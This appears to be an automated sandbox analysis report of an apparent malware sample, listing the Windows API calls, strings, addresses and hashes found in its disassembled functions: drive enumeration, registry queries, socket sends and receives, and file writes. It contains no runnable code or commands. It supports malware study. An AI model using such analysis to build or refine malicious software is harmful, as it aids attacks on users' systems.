                                                                          • Instruction ID: a0bb0d1763f58919fadf504be34b28e9f79e59c8b133fe7279793914b8ec670d
                                                                          • Opcode Fuzzy Hash: 588e7e45e4f33f9d0918584f63058166f89edb9a452884b7bd86cb7a942d91ee
                                                                          • Instruction Fuzzy Hash: 92310AB0D05218EFCB50DF99DC88BDDBBB4FB48304F1085AAE609B6290D7795A84CF59
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetLogicalDrives.KERNEL32 ref: 00406346
                                                                          • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 00406394
                                                                          • RegQueryValueExW.ADVAPI32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 004063C1
                                                                          • RegCloseKey.ADVAPI32(?), ref: 004063DE
                                                                          Strings
                                                                          • NoDrives, xrefs: 004063B8
                                                                          • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, xrefs: 00406387
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CloseDrivesLogicalOpenQueryValue
                                                                          • String ID: NoDrives$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
                                                                          • API String ID: 2666887985-3471754645
                                                                          • Opcode ID: 46903cfc04ebe2d267c9076d905ed80b260209c2cd6c3f03203de3a9be594a56
                                                                          • Instruction ID: 85ff322c7a95afac5eb7bad71570108e7de378f82f6edd769b1cbb34207a952c
                                                                          • Opcode Fuzzy Hash: 46903cfc04ebe2d267c9076d905ed80b260209c2cd6c3f03203de3a9be594a56
                                                                          • Instruction Fuzzy Hash: 7F11D071E40209DBDB10CFD0D946BEEBBB4FB08704F108159E915B7280D7B8A655CF95
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040D3C4
                                                                            • Part of subcall function 0040D490: WaitForSingleObject.KERNEL32(?,00000000), ref: 0040D4D0
                                                                            • Part of subcall function 0040D490: CloseHandle.KERNEL32(?), ref: 0040D4E9
                                                                          • CreateThread.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 0040D41F
                                                                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040D45C
                                                                          • GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040D467
                                                                          • DuplicateHandle.KERNEL32(00000000), ref: 0040D46E
                                                                          • LeaveCriticalSection.KERNEL32(-00000004), ref: 0040D482
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CriticalCurrentHandleProcessSection$CloseCreateDuplicateEnterLeaveObjectSingleThreadWait
                                                                          • String ID:
                                                                          • API String ID: 2251373460-0
                                                                          • Opcode ID: 5fa48f327af51f71990b0ea36d5f90ef72817f248d38badcc5e164c225a1f3f1
                                                                          • Instruction ID: 3905a71daa0159e526e2bdbd6071991b109cebefbf6d86c4cf37b1ecd5ad8e98
                                                                          • Opcode Fuzzy Hash: 5fa48f327af51f71990b0ea36d5f90ef72817f248d38badcc5e164c225a1f3f1
                                                                          • Instruction Fuzzy Hash: F831F8B4A00208EFDB04DF94D889F9EBBB5EB48308F0081A9E945A7390D775AA95CF54
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: _allshl_aullshr
                                                                          • String ID:
                                                                          • API String ID: 673498613-0
                                                                          • Opcode ID: 9155782f3457772601139595953a0e4fee1c65b8433155f9dc873cd430b809bd
                                                                          • Instruction ID: a69f75a9761dffb427665dfb7b283027f7726bbdceffba7061474d3de6b788b4
                                                                          • Opcode Fuzzy Hash: 9155782f3457772601139595953a0e4fee1c65b8433155f9dc873cd430b809bd
                                                                          • Instruction Fuzzy Hash: 0B111F326005186B8B10EF5EC44268ABBD6EF84361B15C136FC2CDF35AD675D9414BD4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • memcpy.NTDLL(00000004,00000000,?,?), ref: 00401258
                                                                          • htons.WS2_32(?), ref: 00401281
                                                                          • sendto.WS2_32(?,00000000,?,00000000,?,00000010), ref: 004012A9
                                                                          • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004012BE
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ExchangeInterlockedhtonsmemcpysendto
                                                                          • String ID: pdu
                                                                          • API String ID: 2164660128-2320407122
                                                                          • Opcode ID: 91b30ad39cb42ad1c5fa696c873bf215f40042e2e73f1e3bbc8ac8a0414f7340
                                                                          • Instruction ID: 2eaa47314137ae48bc86a2d98b28c98b453a90a93c27253c89cefaff09ddeb80
                                                                          • Opcode Fuzzy Hash: 91b30ad39cb42ad1c5fa696c873bf215f40042e2e73f1e3bbc8ac8a0414f7340
                                                                          • Instruction Fuzzy Hash: 7031B2362083009BC710DF6DD880A9BBBE4AFC9714F04457EFD98A7382D6349914C7AB
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401846
                                                                          • InterlockedDecrement.KERNEL32(?), ref: 004018B1
                                                                            • Part of subcall function 004017A0: EnterCriticalSection.KERNEL32(?,?,?,?,0040186C,?,?), ref: 004017B0
                                                                            • Part of subcall function 004017A0: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004017C0
                                                                            • Part of subcall function 004017A0: LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 004017CD
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Interlocked$CriticalExchangeSection$DecrementEnterLeave
                                                                          • String ID:
                                                                          • API String ID: 3966618661-0
                                                                          • Opcode ID: 5b1d9706ac0f4861890903663e3aab6c9f99d0d6f1a575e52deddebed6e66e4c
                                                                          • Instruction ID: 99e37592b547e3d1ed5d588db8744cb94e6869326ec40c3cf91f75bef10dfbd8
                                                                          • Opcode Fuzzy Hash: 5b1d9706ac0f4861890903663e3aab6c9f99d0d6f1a575e52deddebed6e66e4c
                                                                          • Instruction Fuzzy Hash: CA41A175604B02ABC718DB39D848797F3A4BF84314F14827EE82D933D1E739A855CB99
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • CreateFileW.KERNEL32(00417490,40000000,00000000,00000000,00000002,00000002,00000000), ref: 0040AE58
                                                                          • WriteFile.KERNEL32(000000FF,00000000,?,?,00000000), ref: 0040AE79
                                                                          • FlushFileBuffers.KERNEL32(000000FF), ref: 0040AE83
                                                                          • CloseHandle.KERNEL32(000000FF), ref: 0040AE8D
                                                                          • InterlockedExchange.KERNEL32(00416068,0000003D), ref: 0040AE9A
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: File$BuffersCloseCreateExchangeFlushHandleInterlockedWrite
                                                                          • String ID:
                                                                          • API String ID: 442028454-0
                                                                          • Opcode ID: 357d87ca73b11ea0aaada163076beaff9b4c740b73e671433b9cbd3897c2d74f
                                                                          • Instruction ID: 0da220b8b1f77c32e275edd0b19d3e77d455ccd5d956affd98337f50121a7ab7
                                                                          • Opcode Fuzzy Hash: 357d87ca73b11ea0aaada163076beaff9b4c740b73e671433b9cbd3897c2d74f
                                                                          • Instruction Fuzzy Hash: D5315EB8A40309EBCB14CF98DC45F9EB771FB48300F208569E51567390D774AA51CB59
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: _allshl
                                                                          • String ID:
                                                                          • API String ID: 435966717-0
                                                                          • Opcode ID: e97f6b688e4649d03a543f53d1e87ffd622cab317a47a1f81aa90ba96deec30e
                                                                          • Instruction ID: bcae3434c2129d449cda67bd59c491ccebf17daabcdef2e049336039ec6bac91
                                                                          • Opcode Fuzzy Hash: e97f6b688e4649d03a543f53d1e87ffd622cab317a47a1f81aa90ba96deec30e
                                                                          • Instruction Fuzzy Hash: 3EF03172901428AB9750EEFF85424CBF7E69F98365F218176F81CE3261E9709D0546F2
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040D79D,00000000), ref: 00401346
                                                                          • WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040D79D,00000000), ref: 00401352
                                                                          • CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040D79D,00000000), ref: 0040135C
                                                                            • Part of subcall function 0040A3F0: HeapFree.KERNEL32(?,00000000,00402612,?,00402612,?), ref: 0040A44B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CloseEventFreeHandleHeapObjectSingleWait
                                                                          • String ID: pdu
                                                                          • API String ID: 309973729-2320407122
                                                                          • Opcode ID: e0f329f12d2259528821c27011c0918a976d96f57bacaacdd1962e62a77ab920
                                                                          • Instruction ID: d174ec339e303b727d6f690e0c81bd26c44cc0430c196550e953614590448db6
                                                                          • Opcode Fuzzy Hash: e0f329f12d2259528821c27011c0918a976d96f57bacaacdd1962e62a77ab920
                                                                          • Instruction Fuzzy Hash: 0C01D6765003009BCB249F55ECC0D9B7769AF49311704467AFC05AB396C638E8508775
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetDriveTypeW.KERNEL32(0040629F), ref: 004062CD
                                                                          • QueryDosDeviceW.KERNEL32(0040629F,?,00000208), ref: 0040630C
                                                                          • StrCmpNW.SHLWAPI(?,\??\,00000004), ref: 00406324
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: DeviceDriveQueryType
                                                                          • String ID: \??\
                                                                          • API String ID: 1681518211-3047946824
                                                                          • Opcode ID: 1f4486d3417c416fbe6947eda0d50e0154391f7c0caa962a9d661e7b197f6568
                                                                          • Instruction ID: fe1cba3e8f96ca8ec28924db8accccc61f2e919e988f9d14e04ecf4ac666ff3a
                                                                          • Opcode Fuzzy Hash: 1f4486d3417c416fbe6947eda0d50e0154391f7c0caa962a9d661e7b197f6568
                                                                          • Instruction Fuzzy Hash: 1901FFB0A4021CEBCB20DF55DD49BDAB7B4AB04704F00C0BAAA05A7280E6759ED5DF9C
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • CreateFileW.KERNEL32(`k@,80000000,00000001,00000000,00000003,00000000,00000000,00406B60), ref: 0040E9D0
                                                                          • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040E9E5
                                                                          • CloseHandle.KERNEL32(000000FF), ref: 0040E9F2
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: File$CloseCreateHandleSize
                                                                          • String ID: `k@
                                                                          • API String ID: 1378416451-1195631054
                                                                          • Opcode ID: df23a932ebc1e553a736a6907ae04855c01650ef694a25ef55576e6386c5cc64
                                                                          • Instruction ID: 241503f102ff988800a1529ff4214dfa730f02490b079578101ca7fb38dafef3
                                                                          • Opcode Fuzzy Hash: df23a932ebc1e553a736a6907ae04855c01650ef694a25ef55576e6386c5cc64
                                                                          • Instruction Fuzzy Hash: F7F01C74A40308FBDB20DFA4DC49B8DBBB4AB04701F208295FA04BB2D0D6B56A908B44
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • ioctlsocket.WS2_32 ref: 0040112B
                                                                          • recvfrom.WS2_32 ref: 0040119C
                                                                          • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004011B2
                                                                          • WaitForSingleObject.KERNEL32(?,00000001), ref: 004011D3
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ExchangeInterlockedObjectSingleWaitioctlsocketrecvfrom
                                                                          • String ID:
                                                                          • API String ID: 3980219359-0
                                                                          • Opcode ID: 7cf137ea0161487f7737358bd29a50fac6b28174b756953d330c0cbf6919b593
                                                                          • Instruction ID: e93cb10c30494a4e33d228fb1a439b2c2c35c7ccb48714dd22f79771c93e9d83
                                                                          • Opcode Fuzzy Hash: 7cf137ea0161487f7737358bd29a50fac6b28174b756953d330c0cbf6919b593
                                                                          • Instruction Fuzzy Hash: E921E5B11043016FC304DF65DC84A6BB7E9EF88314F004A3EF55592290E774DD4887EA
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 00401F83
                                                                          • WSAGetOverlappedResult.WS2_32(?,?,?,00000000,?), ref: 00401FAF
                                                                          • WSAGetLastError.WS2_32 ref: 00401FB9
                                                                          • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 00401FF9
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CompletionQueuedStatus$ErrorLastOverlappedResult
                                                                          • String ID:
                                                                          • API String ID: 2074799992-0
                                                                          • Opcode ID: 6bed54afebf4a7a641f0d3d0188a4da0f589ce10c8675e9945177f158b09e6ba
                                                                          • Instruction ID: 85cdc4ac02e7a7d961e62fa06f42dc9c3305788cd6d7a2bd32de2e1c20a60a18
                                                                          • Opcode Fuzzy Hash: 6bed54afebf4a7a641f0d3d0188a4da0f589ce10c8675e9945177f158b09e6ba
                                                                          • Instruction Fuzzy Hash: DD212F715083159BC200DF55D884D5BB7E8BFCCB54F044A2EF59493291D734EA49CBAA
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 00401C88
                                                                          • WSAGetLastError.WS2_32(?,?,004021A5,00000000), ref: 00401C90
                                                                          • Sleep.KERNEL32(00000001,?,?,004021A5,00000000), ref: 00401CA6
                                                                          • WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 00401CCC
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Recv$ErrorLastSleep
                                                                          • String ID:
                                                                          • API String ID: 3668019968-0
                                                                          • Opcode ID: 115ea0e646e0c4f71d919f36be7c9bac7cbabd22de7b6b0e5f0bd0a6bc0a71ea
                                                                          • Instruction ID: df3cbe2ca7d05c2b70b960210cdf5b20c1916dde76b22b2cec88194eea221140
                                                                          • Opcode Fuzzy Hash: 115ea0e646e0c4f71d919f36be7c9bac7cbabd22de7b6b0e5f0bd0a6bc0a71ea
                                                                          • Instruction Fuzzy Hash: 6A11AD72148305AFD310CF65EC84AEBB7ECEB88710F40492AF945D2140E679E94997B6
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 00401B0C
                                                                          • WSAGetLastError.WS2_32 ref: 00401B12
                                                                          • Sleep.KERNEL32(00000001), ref: 00401B28
                                                                          • WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 00401B4A
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Send$ErrorLastSleep
                                                                          • String ID:
                                                                          • API String ID: 2121970615-0
                                                                          • Opcode ID: 68b99e883f80ec4d8e473af3bb6ab78542c6fab184647b02e4118960a37caac2
                                                                          • Instruction ID: 6027246a5f20d5291fae036152240cd5c1f9414458335baedc5b4335fd2ad738
                                                                          • Opcode Fuzzy Hash: 68b99e883f80ec4d8e473af3bb6ab78542c6fab184647b02e4118960a37caac2
                                                                          • Instruction Fuzzy Hash: 8F014F712483046EE7209B96DC88F9B77A8EBC4711F508429F608961C0D7B5A9459B79
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • EnterCriticalSection.KERNEL32(?), ref: 0040D669
                                                                          • CloseHandle.KERNEL32(?), ref: 0040D698
                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 0040D6A7
                                                                          • DeleteCriticalSection.KERNEL32(?), ref: 0040D6B4
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CriticalSection$CloseDeleteEnterHandleLeave
                                                                          • String ID:
                                                                          • API String ID: 3102160386-0
                                                                          • Opcode ID: 7bf4f18b4702a230417702d69d1d85fee5c3e33d7782737d8a2bd2494ce2794f
                                                                          • Instruction ID: fd906f08b3b88ca1f2a1246d33854d1cb2ade3c35c50db1fce3d72ba6cb97bf7
                                                                          • Opcode Fuzzy Hash: 7bf4f18b4702a230417702d69d1d85fee5c3e33d7782737d8a2bd2494ce2794f
                                                                          • Instruction Fuzzy Hash: 64115EB4D00208EBDB08DF94D984A9DB775FF44309F1085A9E80AA7341D739EE94DB85
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,0040186C,?,?), ref: 004017B0
                                                                          • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004017C0
                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 004017CD
                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 00401808
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                                          • String ID:
                                                                          • API String ID: 2223660684-0
                                                                          • Opcode ID: 998351d4031ac32c6d6d10c259f6772ab7bb4c14647e9de6e02c89c2d1c81f5d
                                                                          • Instruction ID: a0dc8c3c5f9b8335a8c68536f832427d4bfc411db9c79380583e721672fa548d
                                                                          • Opcode Fuzzy Hash: 998351d4031ac32c6d6d10c259f6772ab7bb4c14647e9de6e02c89c2d1c81f5d
                                                                          • Instruction Fuzzy Hash: 4F01F7792423009FC7209F26ED84A9B73E8AF45711F00043EE44693650DB39E401CB28
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • CoInitializeEx.OLE32(00000000,00000002,?,?,00407C66), ref: 00406F58
                                                                          • SysAllocString.OLEAUT32(00417280), ref: 00406F63
                                                                          • CoUninitialize.OLE32 ref: 00406F88
                                                                            • Part of subcall function 00406FA0: SysFreeString.OLEAUT32(00000000), ref: 004071B8
                                                                          • SysFreeString.OLEAUT32(00000000), ref: 00406F82
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: String$Free$AllocInitializeUninitialize
                                                                          • String ID:
                                                                          • API String ID: 459949847-0
                                                                          • Opcode ID: d37febddbfc04ccb5ddcd79972a62c48e1c377c34fe451ccbb6e607dda6765f2
                                                                          • Instruction ID: 8a6b4e1f6fa2c5cc19a61eea1a68b2ec0aac259eb3575b686c6209df8efe477e
                                                                          • Opcode Fuzzy Hash: d37febddbfc04ccb5ddcd79972a62c48e1c377c34fe451ccbb6e607dda6765f2
                                                                          • Instruction Fuzzy Hash: 98E092B4A40208FBD7009BE0ED0EB8D77349B05305F0040A4F90666291DAB95E80C755
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                            • Part of subcall function 00407230: CoCreateInstance.OLE32(00000000,00000000,00004401,00000000,00000000), ref: 00407250
                                                                          • SysFreeString.OLEAUT32(00000000), ref: 004071B8
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
